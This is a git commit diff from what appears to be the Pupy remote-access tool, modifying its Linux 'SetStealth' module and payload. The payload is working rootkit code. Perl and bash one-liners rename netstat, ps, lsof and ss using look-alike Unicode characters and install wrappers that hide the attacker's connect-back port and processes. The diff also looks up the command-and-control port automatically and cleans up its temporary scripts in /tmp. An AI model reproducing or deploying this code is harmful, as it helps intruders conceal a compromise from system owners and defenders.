Merge branch 'RedSunEmpire-master' into dev

This commit is contained in:
n1nj4sec 2016-05-03 18:13:10 +02:00
commit 5d72cfaac5
2 changed files with 54 additions and 48 deletions

View File

@ -1,31 +1,23 @@
#!/usr/bin/env python #!/usr/bin/env python
from pupylib.PupyModule import * from pupylib.PupyModule import *
from pupylib.utils.rpyc_utils import redirected_stdio
__class_name__="SetStealth" __class_name__="SetStealth"
def print_callback(data):
sys.stdout.write(data)
sys.stdout.flush()
@config(cat="manage", compat="unix") @config(compat="linux", cat="manage")
class SetStealth(PupyModule): class SetStealth(PupyModule):
"""Hides the runnin process from netstat, ss, ps, lsof by using modified binaries. Be careful when choosing the port. """Hides the runnin process from netstat, ss, ps, lsof by using modified binaries.
Credits to: http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/ Credits to: http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/
Demo: https://vimeo.com/157356150"""
********************** /!\ WARNING /!\ ********************** dependencies=["linux_stealth"]
* Do NOT run the stealh module more than ONCE on a machine. *
* Running it two times will brake the binaries. *
*************************************************************
NOTE: The pp.py script needs to be running with root privileges in order to run this module."""
def init_argparse(self): def init_argparse(self):
self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__) self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__)
self.arg_parser.add_argument('port', type=int, help='The port number to which Pupy is connecting to.') self.arg_parser.add_argument('--port', default=None, help='The port number to which Pupy is connecting to.')
def is_compatible(self):
a,r=super(SetStealth, self).is_compatible()
if not a:
return False, r
if self.client.conn.modules['subprocess'].check_output(r"ls -l `dirname \`which netstat\``/net*tat | wc -l", shell=True).strip() == "2":
return False, "It looks like this module has already been run on this machine."
return True, ""
def run(self, args): def run(self, args):
self.client.load_package("linux_stealth") with redirected_stdio(self.client.conn):
self.client.conn.modules['linux_stealth'].run(str(args.port)) self.client.conn.modules['linux_stealth'].run(args.port)
self.success("Module executed successfully.") self.success("Module executed successfully.")

View File

@ -1,18 +1,31 @@
#!/usr/bin/env python #!/usr/bin/env python
import os import sys
import subprocess import subprocess
import os
import time import time
def cmd_exists(cmd):
return subprocess.call("type " + cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
def run(port): def run(port=None):
if port is None:
try:
import pupy
host, port=pupy.get_connect_back_host().split(":")
except:
raise Exception("pupy connect back port couldn't be found, please precise it manually")
print "hidding port %s ..."%port
a=subprocess.check_output(["netstat", "-tn"])
if port in a:
def cmd_exists(cmd):
return subprocess.call("type " + cmd, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
if cmd_exists("gcc") == True: if cmd_exists("gcc") == True:
bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'""" bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'"""
#subprocess.call(bash, shell=True)
with open('/tmp/b', 'w') as f: with open('/tmp/b', 'w') as f:
f.write(bash) f.write(bash)
f.close()
os.system("bash /tmp/b") os.system("bash /tmp/b")
time.sleep(3) time.sleep(3)
os.remove("/tmp/b") os.remove("/tmp/b")
@ -20,6 +33,7 @@ def run(port):
bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'""" bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'"""
with open("/tmp/p", "w") as f: with open("/tmp/p", "w") as f:
f.write(bash) f.write(bash)
f.close()
os.system("bash /tmp/p") os.system("bash /tmp/p")
time.sleep(3) time.sleep(3)
os.remove("/tmp/p") os.remove("/tmp/p")
@ -30,7 +44,7 @@ def run(port):
os.system("mv "+path+"ss "+path+"zss") os.system("mv "+path+"ss "+path+"zss")
with open(path+"ss", "w") as newss: with open(path+"ss", "w") as newss:
newss.write(bashss) newss.write(bashss)
newss.close()
os.system("chmod +x "+path+"ss") os.system("chmod +x "+path+"ss")
#blazo - fresh orange else:
#brock - september 22nd print "port is already hidden"
#Creds to: www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/